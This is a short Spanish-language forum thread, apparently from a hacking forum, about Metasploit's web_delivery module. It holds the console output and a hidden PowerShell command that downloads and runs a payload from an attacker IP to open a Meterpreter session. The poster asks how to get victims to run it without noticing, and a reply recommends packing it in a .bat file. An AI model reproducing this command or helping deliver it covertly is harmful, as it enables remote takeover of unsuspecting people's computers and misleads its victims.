Hola,
Estuve viendo algunos tutoriales sobre el script de Metasploit web_delivery.
Luego de lanzar el exploit, queda a la escucha:
msf exploit(web_delivery) > exploit
- Exploit running as background job.
- Started HTTP reverse handler on http://0.0.0.0:4444/
msf exploit(web_delivery) > - Using URL: http://0.0.0.0:8080/ZMDamELiX
- Local IP: http://192.168.1.102:8080/ZMDamELiX
- Server started.
- Run the following command on the target machine:
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.102:8080/ZMDamELiX'))
Estuve viendo que del lado de la victima hay que ejecutar el siguiente código para iniciar una sesión de meterpreter:
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.102:8080/ZMDamELiX'))
Ví que lo hacen vía CMD. También probé con un archivo .BAT y funcionó.
Mi duda es si hay alguna forma automática para que se ejecute el código. Ya que es muy díficil que la victima copie el código y lo ejecute en CMD, no?
Si alguien tiene alguna idea se lo agradezco!
@RxB (https://underc0de.org/foro/index.php?action=profile;u=49994), efectivamente la unica forma que puede funcionarte es con un .bat
Dudo que haya otra forma de hacerlo.
Saludos!
ANTRAX